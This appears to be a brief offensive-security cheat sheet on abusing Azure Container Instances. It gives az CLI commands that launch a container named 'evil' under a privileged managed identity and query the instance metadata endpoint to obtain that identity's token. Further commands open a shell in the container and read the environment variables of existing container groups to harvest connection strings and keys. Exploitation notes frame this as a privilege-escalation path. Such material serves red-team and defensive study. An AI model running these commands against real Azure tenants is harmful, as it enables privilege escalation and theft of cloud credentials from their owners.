Azure Container Instances (ACI) run a single container without a cluster. Creating a container group with an assigned managed identity gives you code execution that holds that identity's token, and reading an existing group's definition exposes its environment variables, a common home for secrets.
Run a container as a chosen identity#
az container create -g <rg> -n evil --image <registry>.azurecr.io/x \
--assign-identity <userAssignedIdentityId> --command-line "/bin/sh -c 'curl -s -H Metadata:true http://169.254.169.254/...'"
az container exec -g <rg> -n evil --exec-command "/bin/sh"
Read an existing group#
az container show -g <rg> -n <group> --query "containers[].environmentVariables"
Exploitation notes#
- The
--assign-identitypath mirrors the VM managed-identity escalation: attach a privileged user-assigned identity, then mint its token from inside the container. - Environment variables and mounted Azure File shares on existing groups frequently carry connection strings and keys.
Tools#
- Azure CLI (
az container create,az container exec,az container show).